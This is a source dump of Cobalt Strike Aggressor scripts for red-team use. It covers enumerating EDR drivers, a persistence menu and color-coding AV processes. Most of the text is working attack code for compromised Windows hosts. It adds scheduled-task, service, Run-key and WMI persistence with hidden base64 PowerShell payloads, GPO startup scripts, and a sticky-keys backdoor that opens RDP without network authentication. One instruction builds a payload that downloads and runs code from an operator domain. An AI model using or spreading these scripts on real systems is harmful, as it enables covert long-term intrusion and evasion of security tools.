269 | if ('pgpwdefs.sys' in @matches || 'GEProtection.sys' in @matches || 'diflt.sys' in @matches || 'sysMon.sys' in @matches || 'ssrfsf.sys' in @matches || 'emxdrv2.sys' in @matches || 'reghook.sys' in @matches || 'spbbcdrv.sys' in @matches || 'bhdrvx86.sys' in @matches || 'bhdrvx64.sys' in @matches || 'SISIPSFileFilter.sys' in @matches || 'symevent.sys' in @matches || 'vxfsrep.sys' in @matches || 'VirtFile.sys' in @matches || 'SymAFR.sys' in @matches || 'symefasi.sys' in @matches || 'symefa.sys' in @matches || 'symefa64.sys' in @matches || 'SymHsm.sys' in @matches || 'evmf.sys' in @matches || 'GEFCMP.sys' in @matches || 'VFSEnc.sys' in @matches || 'pgpfs.sys' in @matches || 'fencry.sys' in @matches || 'symrg.sys' in @matches) {
270 | blog($bid, "Symantec Found!");
271 | }
272 |
273 | ### Trend Micro
274 | if ('TMUMS.sys' in @matches || 'hfileflt.sys' in @matches || 'TMUMH.sys' in @matches || 'AcDriver.sys' in @matches || 'SakFile.sys' in @matches || 'SakMFile.sys' in @matches || 'fileflt.sys' in @matches || 'TmEsFlt.sys' in @matches || 'tmevtmgr.sys' in @matches || 'TmFileEncDmk.sys' in @matches) {
275 | blog($bid, "Trend Micro Inc Found!");
276 | }
277 |
278 | ### Verdasys
279 | if ('dgdmk.sys' in @matches || 'ndgdmk.sys' in @matches) {
280 | blog($bid, "Verdasys Inc. Found!");
281 | }
282 |
283 | ### Webroot
284 | if ('ssfmonm.sys' in @matches) {
285 | blog($bid, "Webroot Software, Inc. Found!");
286 | }
287 |
288 | }
289 |
290 | popup beacon_bottom {
291 | item "EDR Query" {
292 | query($1);
293 | }
294 | }
295 |
--------------------------------------------------------------------------------
/Persistence/Persistence_Menu.cna:
--------------------------------------------------------------------------------
1 | #Persistence Menu
2 | #Author: @r3dQu1nn
3 | #Beacon menu for common methods used for Persistence
4 |
5 | popup beacon_top {
6 | menu "&Red Team"{
7 | #Persistence Menu
8 | menu "&Persistence" {
9 | item "&Schtasks Persistence" {
10 | local('$bid');
11 | foreach $bid ($1) {
12 | persistUserSchtasks($bid);
13 | }
14 | }
15 | item "&Service EXE Persistence" {
16 | local('$bid');
17 | foreach $bid ($1) {
18 | if (-isadmin $bid) {
19 | persistCustomService($bid);
20 | }
21 | else {
22 | berror($1, "\c4Persistence Requires Admin Level Privileges");
23 | }
24 | }
25 | }
26 | item "&Registry Persistence" {
27 | local('$bid');
28 | foreach $bid ($1) {
29 | persistRegistry($bid);
30 | }
31 | }
32 | item "&HKCU Run Key Registry PowerShell Persistence" {
33 | local('$bid');
34 | foreach $bid ($1) {
35 | persistRegistryHKCU($bid);
36 | }
37 | }
38 | item "&HKLM Run Key Registry PowerShell Persistence" {
39 | local('$bid');
40 | foreach $bid ($1) {
41 | persistRegistryHKLM($bid);
42 | }
43 | }
44 | item "&WMI Event Persistence using PowerShell" {
45 | local('$bid');
46 | foreach $bid ($1) {
47 | if (-isadmin $bid) {
48 | persistwmievent($bid);
49 | }
50 | else {
51 | berror($1, "\c4Persistence Requires Admin Level Privileges");
52 | }
53 | }
54 | }
55 | item "&WMI Event Persistence using WMIC" {
56 | local('$bid');
57 | foreach $bid ($1) {
58 | if (-isadmin $bid) {
59 | persistwmieventwmic($bid);
60 | }
61 | else {
62 | berror($1, "\c4Persistence Requires Admin Level Privileges");
63 | }
64 | }
65 | }
66 | item "&Startup Script Local GPO Persistence" {
67 | local('$bid');
68 | foreach $bid ($1) {
69 | if (-isadmin $bid) {
70 | persistStartupGPO($bid);
71 | }
72 | else {
73 | berror($1, "\c4Persistence Requires Admin Level Privileges");
74 | }
75 | }
76 | }
77 | item "&Stickykeys(OSK) BackDoor Persistence (Need RDP Open)" {
78 | local('$bid');
79 | foreach $bid ($1) {
80 | stickykeys($bid);
81 | }
82 | }
83 | item "&Windows Startup Persistence"{
84 | local('$bid');
85 | foreach $bid ($1) {
86 | persistThroughStartUpFolder($bid);
87 | }
88 | }
89 | }
90 | }
91 | }
92 |
93 |
94 | #User Schtasks Persistence
95 | #Author: @r3dQu1nn
96 | #Runs as current user for the selected beacon
97 | #Meant for quick user level persistence upon initial access
98 | #Thanks to @noone and bluescreenofjeff for help
99 |
100 | sub persistUserSchtasks {
101 | $bid = $1;
102 | $dialog = dialog("User Schtasks Persistence", %(taskname => "Evil Task Name..", targetpath => "Target Path..", user => "User to Run as..", schedule => "Schedule modifier..", payloadfile => "Select DLL Payload.."), lambda({
103 | if ("$3['taskname']" ismatch 'Evil Task Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['payloadfile']" ismatch 'Select DLL Payload..' || "$3['user']" ismatch 'User to Run as..' || "$3['schedule']" ismatch 'Schedule modifier..') {
104 | berror($bid, "\c4Please enter a valid Task Name, Target Path, and a valid Payload File.");
105 | break;
106 | }
107 | else {
108 | bcd($bid, $3['targetpath']);
109 | bupload($bid, $3['payloadfile']);
110 | bpowerpick($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
111 | bpowerpick($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
112 | }
113 | }));
114 |
115 | dialog_description($dialog, "User Schtasks Persistence - Generates a schtask for persistence on selected beacon.");
116 |
117 | drow_text($dialog, "taskname", "Schtasks Taskname:");
118 | drow_text($dialog, "user", "User to Run as:");
119 | drow_text($dialog, "targetpath", "Target Path:");
120 | drow_text($dialog, "schedule", "Schedule Modifier:");
121 | drow_file($dialog, "payloadfile", "DLL Payload:");
122 |
123 | dbutton_action($dialog, "Create");
124 | dialog_show($dialog);
125 |
126 | }
127 |
128 | #Admin Level Custom Service EXE Persistence
129 | #Author: @r3dQu1nn
130 | #Runs as elevated user/SYSTEM for the selected beacon
131 |
132 | sub persistCustomService {
133 | $bid = $1;
134 | $dialog = dialog("Admin Level Custom Service EXE Persistence", %(servicename => "Custom Service Name..", display => "Display Name for Custom Service..", description => "Description for Custom Service..", targetpath => "Target Path..", payloadfile => "Select Payload.."), lambda({
135 | if ("$3['servicename']" ismatch 'Custom Service Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['display']" ismatch 'Display Name for Custom Service..' || "$3['description']" ismatch 'Description for Custom Service..' || "$3['payloadfile']" ismatch 'Select Payload..') {
136 | berror($bid, "\c4Please enter a valid Custom Service Name, Target Path, Display Name, Description and Payload File.");
137 | break;
138 | }
139 | else {
140 | bcd($bid, $3['targetpath']);
141 | bupload($bid, $3['payloadfile']);
142 | btimestomp($bid, "$3['payloadfile']", "C:\\Windows\\System32\\cmd.exe");
143 | bpowerpick($bid, 'sc delete '.$3['servicename'].'');
144 | bpowerpick($bid, 'sc create '.$3['servicename'].' binpath= "'.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].'" error= ignore start= auto DisplayName= "'.$3['display'].'"');
145 | bpowerpick($bid, 'sc description '.$3['servicename'].' "'.$3['description'].'"');
146 | bpowerpick($bid, 'sc start '.$3['servicename'].'');
147 | }
148 | }));
149 | dialog_description($dialog, "Generates a Custom Service for Admin Level persistence on selected beacon. **Only Service EXE Payloads should be used**");
150 |
151 | drow_text($dialog, "servicename", "Custom Service Name:");
152 | drow_text($dialog, "display", "Display Name for Custom Service:");
153 | drow_text($dialog, "description", "Description for Custom Service:");
154 | drow_text($dialog, "targetpath", "Target/Bin Path:");
155 | drow_file($dialog, "payloadfile", "Payload:");
156 |
157 | dbutton_action($dialog, "Create");
158 | dialog_show($dialog);
159 |
160 | }
161 |
162 | #HKCU Run Key Registry PowerShell Persistence
163 | #Author: @r3dQu1nn
164 | #Generates a powershell Base64 Encoded payload as a HKCU Run Key Registry Entry for persistence on selected beacon based off a HTTP/HTTPS Listener
165 | #Big thanks to @christruncer and @merrillmatt011 for the help and code snippets
166 | #Fileless Registry Persistence using PowerShell
167 |
168 | sub payloadgenerate {
169 | foreach $name (listeners()) {
170 | $original_listener = $name;
171 | $listener_name = lc($name);
172 | if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
173 | $data = artifact($original_listener, "powershell");
174 | return base64_encode($data);
175 | }
176 | }
177 | }
178 |
179 | sub persistRegistryHKCU {
180 | $bid = $1;
181 | $dialog = dialog("HKCU Run Key Registry PowerShell Persistence (User Level)", %(keyname => "Key Name for Payload..", keyname1 => "Key Name to execute Payload.."), lambda({
182 | if ("$3['keyname']" ismatch 'Key Name for Payload..' || "$3['keyname1']" ismatch 'Key Name to execute Payload..') {
183 | berror($bid, "\c4Please enter valid Registry Key Names.");
184 | break;
185 | }
186 | else {
187 | $data = payloadgenerate($bid);
188 | $powershellcmd = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
189 | bpowerpick!($bid, $powershellcmd);
190 | blog($bid, "\cBSetting the first HKCU Run Key Value as '".$3['keyname']."'...");
191 | $powershellcmd1 = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
192 | bpowerpick!($bid, $powershellcmd1);
193 | blog($bid, "\cBSetting the second HKCU Run Key Value as '".$3['keyname1']."'...");
194 | blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
195 | $powershellcmd2 = "Get-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
196 | bpowerpick!($bid, $powershellcmd2);
197 | $powershellcmd3 = "Get-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
198 | bpowerpick!($bid, $powershellcmd3);
199 | }
200 | }));
201 |
202 | dialog_description($dialog, "HKCU Run Key Registry PowerShell Persistence - Generates a powershell Base64 Encoded payload as a HKCU Run Key Registry Entry for persistence on selected beacon.");
203 |
204 | drow_text($dialog, "keyname", "Registry Key Name for Payload:");
205 | drow_text($dialog, "keyname1", "Registry Key Name to execute Payload:");
206 |
207 | dbutton_action($dialog, "Create");
208 | dialog_show($dialog);
209 |
210 | }
211 |
212 | #HKLM Run Key Registry PowerShell Persistence
213 | #Author: @r3dQu1nn
214 | #Generates a powershell Base64 Encoded payload as a HKLM Run Key Registry Entry for persistence on selected beacon based off a HTTP/HTTPS Listener
215 |
216 | sub payloadgenerate1 {
217 | foreach $name (listeners()) {
218 | $original_listener = $name;
219 | $listener_name = lc($name);
220 | if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
221 | $data = artifact($original_listener, "powershell");
222 | return base64_encode($data);
223 | }
224 | }
225 | }
226 |
227 | sub persistRegistryHKLM {
228 | $bid = $1;
229 | $dialog = dialog("HKLM Run Key Registry PowerShell Persistence (User Level)", %(keyname => "Key Name for Payload..", keyname1 => "Key Name to execute Payload.."), lambda({
230 | if ("$3['keyname']" ismatch 'Key Name for Payload..' || "$3['keyname1']" ismatch 'Key Name to execute Payload..') {
231 | berror($bid, "\c4Please enter a valid Registry Key Names, Payload, and a valid Path location.");
232 | break;
233 | }
234 | else {
235 | $data = payloadgenerate1($bid);
236 | $powershellcmd = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
237 | bpowerpick!($bid, $powershellcmd);
238 | blog($bid, "\cBSetting the first HKLM Run Key Value as '".$3['keyname']."'...");
239 | $powershellcmd1 = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
240 | bpowerpick!($bid, $powershellcmd1);
241 | blog($bid, "\cBSetting the second HKLM Run Key Value as '".$3['keyname1']."'...");
242 | blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
243 | $powershellcmd2 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
244 | bpowerpick!($bid, $powershellcmd2);
245 | $powershellcmd3 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
246 | bpowerpick!($bid, $powershellcmd3);
247 | }
248 | }));
249 |
250 | dialog_description($dialog, "HKLM Run Key Registry PowerShell Persistence - Generates a powershell Base64 Encoded payload as a HKLM Run Key Registry Entry for persistence on selected beacon.");
251 |
252 | drow_text($dialog, "keyname", "Registry Key Name for Payload:");
253 | drow_text($dialog, "keyname1", "Registry Key Name to execute Payload:");
254 |
255 | dbutton_action($dialog, "Create");
256 | dialog_show($dialog);
257 |
258 | }
259 |
260 | #Registry Persistence
261 | #Author: @r3dQu1nn
262 | #Depending on Registry Location elevated access might be required
263 |
264 | sub persistRegistry {
265 | $bid = $1;
266 | $dialog = dialog("Registry Persistence", %(reglocation => "Registry Location..", keyname => "Key Name..", datatype => "Data Type..(REG_SZ)", keyvalue => "Key Value..(Payload)"), lambda({
267 | if ("$3['reglocation']" ismatch 'Registry Location..' || "$3['keyname']" ismatch 'Key Name..' || "$3['datatype']" ismatch 'Data Type..(REG_SZ)' || "$3['keyvalue']" ismatch 'Key Value..(Payload)') {
268 | berror($bid, "\c4Please enter a valid Registry Location, Key Name, Key Type, and a valid Payload Location.");
269 | break;
270 | }
271 | else {
272 | bpowerpick($bid, 'reg add "'.$3['reglocation'].'" /v "'.$3['keyname'].'" /t "'.$3['datatype'].'" /d "'.$3['keyvalue'].'" /f');
273 | bpowerpick($bid, 'reg query "'.$3['reglocation'].'"');
274 | }
275 | }));
276 |
277 | dialog_description($dialog, "Registry Persistence - Creates a custom Registry Entry for persistence on selected beacon. **HKLM\\ could require elevated access.");
278 |
279 | drow_text($dialog, "reglocation", "Registry Location:");
280 | drow_text($dialog, "keyname", "Registry Key Name:");
281 | drow_text($dialog, "datatype", "Registry Key Type:");
282 | drow_text($dialog, "keyvalue", "Registry Key Value..(Payload Location):");
283 |
284 | dbutton_action($dialog, "Create");
285 | dialog_show($dialog);
286 |
287 | }
288 |
289 | #Permanent WMI Event using WMIC Persistence
290 | #Author: @r3dQu1nn
291 | #Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon
292 | #Very syntax heavy, Test first before using on live targets
293 |
294 | sub persistwmieventwmic {
295 | $bid = $1;
296 | $dialog = dialog("Permanent WMI Event using WMIC Persistence", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", eventconsumer => "CommandLineEventConsumer Name..(Must be different from __EventFilter Name)", commandline => "CommandLineTemplate Syntax..(powershell.exe -w hidden -enc)", payloadfile => "Encoded Payload String.."), lambda({
297 | if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['eventconsumer']" ismatch 'CommandLineEventConsumer Name..(Must be different from __EventFilter Name)' || "$3['commandline']" ismatch 'CommandLineTemplate Syntax..(powershell.exe -w hidden)' || "$3['payloadfile']" ismatch 'Select Encoded Payload..') {
298 | berror($bid, "\c4Please enter a valid Custom __EventFilter Name, Event Query, CommandLineEventConsumer Name, Command Line Options, and the Encoded Payload File.");
299 | break;
300 | }
301 | else {
302 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter CREATE Name="'.$3['eventfilter'].'", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="'.$3['eventquery'].'"');
303 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer CREATE Name="'.$3['eventconsumer'].'", CommandLineTemplate="'.$3['commandline']." ".split("/",$3['payloadfile'])[-1].'"');
304 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"'.$3['eventfilter'].'\"", Consumer="CommandLineEventConsumer.Name=\"'.$3['eventconsumer'].'\""');
305 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list');
306 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list');
307 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list');
308 | }
309 | }));
310 | dialog_description($dialog, "Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload must include IEX ((new-object new.webclient).downloadstring(http://yourdomain/payload.txt)) Utilize the following command to encode the payload correctly: cat payload.txt | iconv --to-code=UTF-16LE | base64** ");
311 |
312 | #base 64 encode IEX of the powershell one liner
313 | #cat payload.txt | iconv --to-code=UTF-16LE | base64
314 |
315 | drow_text($dialog, "eventfilter", "Custom __EventFilter Name:");
316 | drow_text($dialog, "eventquery", "Custom Event Query:");
317 | drow_text($dialog, "eventconsumer", "Custom CommandLineEventConsumer Name:");
318 | drow_text($dialog, "commandline", "Custom Command Line Options:");
319 | drow_text($dialog, "payloadfile", "Custom Encoded Payload String:");
320 |
321 | dbutton_action($dialog, "Create");
322 | dialog_show($dialog);
323 |
324 | }
325 |
326 | #Permanent WMI Event using PowerShell Persistence
327 | #Author: @r3dQu1nn
328 | #Generates a Custom WMI Event using PowerShell for SYSTEM Level persistence on selected beacon
329 | #Very syntax heavy, Test first before using on live targets
330 | #Sample Queries:
331 | ## User Logon:
332 | #SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2
333 | ## System UpTime (Reboot):
334 | #SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320
335 | #https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
336 |
337 | sub persistwmievent {
338 | $bid = $1;
339 | if (-is64 $bid) {
340 | $ExePath = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc";
341 | }
342 | else {
343 | $ExePath = "C:\\Windows\\powershell.exe -nop -w hidden -enc";
344 | }
345 |
346 | $dialog = dialog("Permanent WMI Event Persistence with PowerShell", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", payloadstring => "Encoded Payload String.."), lambda({
347 | if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['payloadstring']" ismatch 'Encoded Payload String..') {
348 | berror($bid, "\c4Please enter a valid __EventFilter Name, Event Query, and an Encoded Payload String.");
349 | break;
350 | }
351 | else {
352 | $powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name=\"".$3['eventfilter']."\";EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"".$3['eventquery']."\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name=\"".$3['eventfilter']."\";CommandLineTemplate =\"". $ExePath ." ".$3['payloadstring']."\"};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};";
353 | bpowerpick!($bid, $powershellcmd);
354 | blog($bid, 'Permanently Storing '.$3['eventfilter'].' in root\CimV2..');
355 | bpowerpick($bid, 'Get-WmiObject __eventFilter -namespace root\subscription -filter "name=\''.$3['eventfilter'].'\'"');
356 | bpowerpick($bid, 'Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name=\''.$3['eventfilter'].'\'"');
357 | }
358 | }));
359 | dialog_description($dialog, "Generates a Custom WMI Event using PowerShell for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload String must be converted to UTF-16LE, base64 encoded and under 1MB.**");
360 |
361 | drow_text($dialog, "eventfilter", "Custom __EventFilter Name:");
362 | drow_text($dialog, "eventquery", "Custom Event Query:");
363 | drow_text($dialog, "payloadstring", "Custom Encoded Payload String:");
364 |
365 | dbutton_action($dialog, "Create");
366 | dialog_show($dialog);
367 | }
368 |
369 | #Startup Script Local GPO Persistence
370 | #Author: @r3dQu1nn
371 | #Generates a Local GPO Entry in psscripts.ini to call a .ps1 script file for persistence on selected beacon
372 | #Calls back as SYSTEM
373 | #**Check permissions with GPO Enumeration (Successful GroupPolicy Directory Listing) first before executing**
374 | #**Beacon execution will cause winlogon.exe to hang and the end user can't login. Once the new beacon checks in inject into another process and kill the original. Update to come out soon.**
375 | #https://cybersyndicates.com/2016/01/system-context-persistence-in-gpo-startup/
376 |
377 | sub persistStartupGPO {
378 |
379 | $bid = $1;
380 | $dialog = dialog("Startup Script Local GPO Persistence", %(scriptfile => "Select PS1 Script File.."), lambda({
381 | if ("$3['scriptfile']" ismatch 'Select PS1 Script File..') {
382 | berror($bid, "\c4Please enter a valid Script Path, and .ps1 Script File.");
383 | break;
384 | }
385 | else {
386 | bcd($bid, "C:\\");
387 | bupload($bid, $3['scriptfile']);
388 | $handle = openf(">psscripts.ini");
389 | writeb($handle, "[ScriptsConfig]\nStartExecutePSFirst=true\n[Startup]\n0CmdLine=".split("/",$3['scriptfile'])[-1]."\n0Parameters=");
390 | closef($handle);
391 | bpowerpick($bid, 'Move-Item -force -path C:\\'.split("/",$3['scriptfile'])[-1].' -destination C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\Startup\\');
392 | bupload($bid, script_resource("psscripts.ini"));
393 | bpowerpick($bid, 'Remove-Item -Force C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\psscripts.ini');
394 | bpowerpick($bid, 'Move-Item -force -path C:\\psscripts.ini -destination C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\');
395 | bpowerpick($bid, 'gpupdate /force');
396 | }
397 | }));
398 |
399 | dialog_description($dialog, "Startup Script Local GPO Persistence - Generates a Local GPO Entry in psscripts.ini to call a .ps1 script file for persistence on selected beacon. **Check permissions with GPO Enumeration (Successful GroupPolicy Directory Listing) first before executing**");
400 |
401 | drow_file($dialog, "scriptfile", ".ps1 Script File:");
402 |
403 | dbutton_action($dialog, "Create");
404 | dialog_show($dialog);
405 |
406 | }
407 |
408 | sub stickykeys {
409 |
410 | bpowerpick($1, 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f');
411 | bpowerpick($1, 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"');
412 | bpowerpick($1, 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d "0" /f');
413 | bpowerpick($1, 'netsh firewall set service type = remotedesktop mode = enable');
414 | bpowerpick($1, 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes');
415 | bpowerpick($1, 'net start TermService');
416 |
417 | }
418 |
419 | sub persistThroughStartUpFolder {
420 | $bid = $1;
421 | $dialog = dialog("Start Up Folder Persistence", %(startup => "Startup Directory Folder..", payload => "Select Payload.."), lambda({
422 | if ("$3['startup']" ismatch 'Startup Directory Folder..' || "$3['payload']" ismatch 'Select Payload..') {
423 | berror($bid, "\c4Please enter a valid Startup Directory Folder, and select a Payload.");
424 | break;
425 | }
426 | else {
427 | bpowerpick($bid, 'cd "'.$3['startup'].'"');
428 | bupload($bid, $3['payload']);
429 | btimestomp($bid, "$3['payload']", "c:\\windows\\system32\\calc.exe");
430 | }
431 | }));
432 | dialog_description($dialog, "Start Up Folder Persistence - Generates a Startup Folder Entry and places a payload inside that folder. **Windows NT 6.0-10.0/All Users Location - %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup | Windows NT 6.0-10.0/Current User Location %SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup");
433 |
434 | drow_text($dialog, "startup", "StartUp Directory Folder Location:");
435 | drow_file($dialog, "payload", "Select Payload:");
436 |
437 | dbutton_action($dialog, "Create");
438 | dialog_show($dialog);
439 | }
440 |
--------------------------------------------------------------------------------
/ProcessColor.cna:
--------------------------------------------------------------------------------
1 | #Color Coded Process Listing
2 | #Author: @r3dQu1nn
3 | #Takes the PS output in CS and color codes all AV processes, explorer process, browsers processes, and current process running
4 | #Thanks to @oldb00t for creating the original beacon-ps-highlight.cna script! Script here: https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight
5 | #This script removes the need for the av_hips_executables.txt requirement
6 |
7 | set BEACON_OUTPUT_PS {
8 |
9 | $bd = bdata($1);
10 | @av = @("Tanium.exe", "360RP.exe", "360SD.exe", "360Safe.exe", "360leakfixer.exe", "360rp.exe", "360safe.exe", "360sd.exe", "360tray.exe", "AAWTray.exe", "ACAAS.exe", "ACAEGMgr.exe", "ACAIS.exe", "AClntUsr.EXE", "ALERT.EXE", "ALERTSVC.EXE", "ALMon.exe", "ALUNotify.exe", "ALUpdate.exe", "ALsvc.exe", "AVENGINE.exe", "AVGCHSVX.EXE", "AVGCSRVX.EXE", "AVGIDSAgent.exe", "AVGIDSMonitor.exe", "AVGIDSUI.exe", "AVGIDSWatcher.exe", "AVGNSX.EXE", "AVKProxy.exe", "AVKService.exe", "AVKTray.exe", "AVKWCtl.exe", "AVP.EXE", "AVP.exe", "AVPDTAgt.exe", "AcctMgr.exe", "Ad-Aware.exe", "Ad-Aware2007.exe", "AddressExport.exe", "AdminServer.exe", "Administrator.exe", "AeXAgentUIHost.exe", "AeXNSAgent.exe", "AeXNSRcvSvc.exe", "AlertSvc.exe", "AlogServ.exe", "AluSchedulerSvc.exe", "AnVir.exe", "AppSvc32.exe", "AtrsHost.exe", "Auth8021x.exe", "AvastSvc.exe", "AvastUI.exe", "Avconsol.exe", "AvpM.exe", "Avsynmgr.exe", "Avtask.exe", "BLACKD.exe", "BWMeterConSvc.exe", "CAAntiSpyware.exe", "CALogDump.exe", "CAPPActiveProtection.exe", "CAPPActiveProtection.exe", "CB.exe", "CCAP.EXE", "CCenter.exe", "CClaw.exe", "CLPS.exe", "CLPSLA.exe", "CLPSLS.exe", "CNTAoSMgr.exe", "CPntSrv.exe", "CTDataLoad.exe", "CertificationManagerServiceNT.exe", "ClShield.exe", "ClamTray.exe", "ClamWin.exe", "Console.exe", "CylanceUI.exe", "DAO_Log.exe", "DLService.exe", "DLTray.EXE", "DLTray.exe", "DRWAGNTD.EXE", "DRWAGNUI.EXE", "DRWEB32W.EXE", "DRWEBSCD.EXE", "DRWEBUPW.EXE", "DRWINST.EXE", "DSMain.exe", "DWHWizrd.exe", "DefWatch.exe", "DolphinCharge.exe", "EHttpSrv.exe", "EMET_Agent.exe", "EMET_Service.exe", "EMLPROUI.exe", "EMLPROXY.exe", "EMLibUpdateAgentNT.exe", "ETConsole3.exe", "ETCorrel.exe", "ETLogAnalyzer.exe", "ETReporter.exe", "ETRssFeeds.exe", "EUQMonitor.exe", "EndPointSecurity.exe", "EngineServer.exe", "EntityMain.exe", "EtScheduler.exe", "EtwControlPanel.exe", "EventParser.exe", "FAMEH32.exe", "FCDBLog.exe", "FCH32.exe", "FPAVServer.exe", "FProtTray.exe", "FSCUIF.exe", "FSHDLL32.exe", "FSM32.exe", "FSMA32.exe", "FSMB32.exe", "FWCfg.exe", "FireSvc.exe", "FireTray.exe", "FirewallGUI.exe", "ForceField.exe", "FortiProxy.exe", "FortiTray.exe", "FortiWF.exe", "FrameworkService.exe", "FreeProxy.exe", "GDFirewallTray.exe", "GDFwSvc.exe", "HWAPI.exe", "ISNTSysMonitor.exe", "ISSVC.exe", "ISWMGR.exe", "ITMRTSVC.exe", "ITMRT_SupportDiagnostics.exe", "ITMRT_TRACE.exe", "IcePack.exe", "IdsInst.exe", "InoNmSrv.exe", "InoRT.exe", "InoRpc.exe", "InoTask.exe", "InoWeb.exe", "IsntSmtp.exe", "KABackReport.exe", "KANMCMain.exe", "KAVFS.EXE", "KAVStart.exe", "KLNAGENT.EXE", "KMailMon.exe", "KNUpdateMain.exe", "KPFWSvc.exe", "KSWebShield.exe", "KVMonXP.exe", "KVMonXP_2.exe", "KVSrvXP.exe", "KWSProd.exe", "KWatch.exe", "KavAdapterExe.exe", "KeyPass.exe", "KvXP.exe", "LUALL.EXE", "LWDMServer.exe", "LockApp.exe", "LockAppHost.exe", "LogGetor.exe", "MCSHIELD.EXE", "MCUI32.exe", "MSASCui.exe", "ManagementAgentNT.exe", "McAfeeDataBackup.exe", "McEPOC.exe", "McEPOCfg.exe", "McNASvc.exe", "McProxy.exe", "McScript_InUse.exe", "McWCE.exe", "McWCECfg.exe", 